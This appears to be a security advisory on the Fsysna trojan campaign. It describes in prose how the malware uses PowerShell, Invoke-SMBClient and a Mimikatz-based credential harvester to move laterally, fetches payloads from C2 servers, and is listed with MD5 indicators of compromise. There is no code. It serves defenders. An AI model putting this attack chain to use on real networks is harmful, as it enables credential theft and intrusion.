Fsysna is an advanced trojan that is being used in an ongoing cryptocurrencymining and ransomware campaign.
The malware used in the attack consists of two variants of Trojans identified as “Trojan.Win32.Fsysna” and a variant of a Monero cryptominer.
This new copied version will perform the same actions as the first Fsysna variant, but will also launch PowerShell scripts to execute Invoke-SMBClient, an open-source SMB application, and Invoke-Cats, a script-based version of the Mimikatz credential harvester. These are used to propagate laterally to other devices. It will then connect to a separate C2 server to download and install the intended payloads. Once this is done it will maintain a C2 connection to control the payloads and collect system information.
It is unclear how the initial infection of an unprotected PC in a network occurs but since the malware utilizes Mimikatz, it is clear that it spreads through unpatched network systems easily and rapidly.
Indicators of Compromise
MD5 File Hashes
- 1c791ae1e8356395f0c4a9a4a8fb65e8 = znhcfvzxd.exe
- 59b18d6146a2aa066f661599c496090d = svchost.exe
- 5ab6f8ca1f22d88b8ef9a4e39fca0c03 = taskmgr.exe
- a4b7940b3d6b03269194f728610784d6 = wmiex.exe
- d4e2ebcf92cf1b2e759ff7ce1f5688ca = taskmgr.exe
- d81233988ec80f56ea4094bad7ab5814 = update.png